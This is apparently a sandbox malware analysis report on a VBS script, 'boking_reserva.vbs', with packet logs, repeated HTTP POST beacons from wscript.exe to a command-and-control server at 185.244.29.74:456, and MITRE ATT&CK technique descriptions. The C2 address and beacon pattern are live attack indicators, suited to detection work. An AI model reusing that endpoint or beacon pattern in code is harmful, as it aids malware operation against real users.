Oct 1, 2024 15:21:39.096676111 CEST	456	49738	185.244.29.74	192.168.2.7
Oct 1, 2024 15:21:40.728677034 CEST	456	49738	185.244.29.74	192.168.2.7
Oct 1, 2024 15:21:40.728796005 CEST	49738	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:21:40.728928089 CEST	49738	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:21:40.733695030 CEST	456	49738	185.244.29.74	192.168.2.7
Oct 1, 2024 15:21:43.832632065 CEST	49739	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:21:43.837522030 CEST	456	49739	185.244.29.74	192.168.2.7
Oct 1, 2024 15:21:43.837673903 CEST	49739	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:21:43.837872028 CEST	49739	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:21:43.842672110 CEST	456	49739	185.244.29.74	192.168.2.7
Oct 1, 2024 15:21:45.465410948 CEST	456	49739	185.244.29.74	192.168.2.7
Oct 1, 2024 15:21:45.465477943 CEST	49739	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:21:45.467247009 CEST	49739	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:21:45.472027063 CEST	456	49739	185.244.29.74	192.168.2.7
Oct 1, 2024 15:21:48.707194090 CEST	49740	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:21:48.712101936 CEST	456	49740	185.244.29.74	192.168.2.7
Oct 1, 2024 15:21:48.712198019 CEST	49740	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:21:48.755170107 CEST	49740	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:21:48.760060072 CEST	456	49740	185.244.29.74	192.168.2.7
Oct 1, 2024 15:21:50.361573935 CEST	456	49740	185.244.29.74	192.168.2.7
Oct 1, 2024 15:21:50.361737967 CEST	49740	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:21:50.362045050 CEST	49740	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:21:50.366997957 CEST	456	49740	185.244.29.74	192.168.2.7
Oct 1, 2024 15:21:53.473753929 CEST	49741	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:21:53.478796959 CEST	456	49741	185.244.29.74	192.168.2.7
Oct 1, 2024 15:21:53.478904963 CEST	49741	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:21:53.479187012 CEST	49741	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:21:53.483984947 CEST	456	49741	185.244.29.74	192.168.2.7
Oct 1, 2024 15:21:55.140837908 CEST	456	49741	185.244.29.74	192.168.2.7
Oct 1, 2024 15:21:55.140908003 CEST	49741	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:21:55.141000032 CEST	49741	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:21:55.146033049 CEST	456	49741	185.244.29.74	192.168.2.7
Oct 1, 2024 15:21:58.255090952 CEST	49742	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:21:58.260262966 CEST	456	49742	185.244.29.74	192.168.2.7
Oct 1, 2024 15:21:58.260363102 CEST	49742	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:21:58.260493040 CEST	49742	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:21:58.265295982 CEST	456	49742	185.244.29.74	192.168.2.7
Oct 1, 2024 15:21:59.920164108 CEST	456	49742	185.244.29.74	192.168.2.7
Oct 1, 2024 15:21:59.920304060 CEST	49742	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:21:59.920427084 CEST	49742	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:21:59.925251007 CEST	456	49742	185.244.29.74	192.168.2.7
Oct 1, 2024 15:22:03.019867897 CEST	49743	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:22:03.025161982 CEST	456	49743	185.244.29.74	192.168.2.7
Oct 1, 2024 15:22:03.025290966 CEST	49743	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:22:03.025521994 CEST	49743	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:22:03.030316114 CEST	456	49743	185.244.29.74	192.168.2.7
Oct 1, 2024 15:22:04.672424078 CEST	456	49743	185.244.29.74	192.168.2.7
Oct 1, 2024 15:22:04.672529936 CEST	49743	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:22:04.672631979 CEST	49743	456	192.168.2.7	185.244.29.74
Oct 1, 2024 15:22:04.677419901 CEST	456	49743	185.244.29.74	192.168.2.7

HTTP Request Dependency Graph

185.244.29.74:456

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:59.521836996 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49705	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:18:24.008790016 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49706	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:18:48.897279978 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49708	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:19:13.435611010 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49709	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:19:18.274163008 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49710	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:19:23.670315981 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49711	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:19:28.432809114 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49712	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:19:33.214124918 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49713	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:19:37.945462942 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49714	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:19:42.902216911 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49715	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:19:48.422962904 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49716	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:19:53.149401903 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49717	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:19:58.221026897 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49718	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:20:02.961849928 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49719	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:20:07.695878983 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49720	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:20:12.472366095 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49721	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:20:17.967408895 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49722	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:20:22.744745016 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49723	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:20:27.494657993 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49724	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:20:32.243328094 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49725	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:20:36.992801905 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49726	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:20:41.728450060 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49727	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:20:46.462950945 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49728	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:20:51.228586912 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49729	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:20:55.964302063 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49730	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:21:00.728833914 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49731	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:21:05.494246960 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49732	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:21:10.245863914 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49733	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:21:15.009183884 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49734	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:21:19.764291048 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	49735	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:21:24.511739969 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	49736	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:21:29.427233934 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	49737	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:21:34.165790081 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	49738	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:21:39.091790915 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	49739	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:21:43.837872028 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	49740	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:21:48.755170107 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	49741	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:21:53.479187012 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	49742	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:21:58.260493040 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	49743	185.244.29.74	456	5828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:22:03.025521994 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Target ID:	0
Start time:	09:17:57
Start date:	01/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\boking_reserva.vbs"
Imagebase:	0x7ff7b7ea0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report boking_reserva.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: wscript.exePID: 5828, Parent PID: 4056

General

Chronological Activities

Disassembly

Windows Analysis Report
boking_reserva.vbs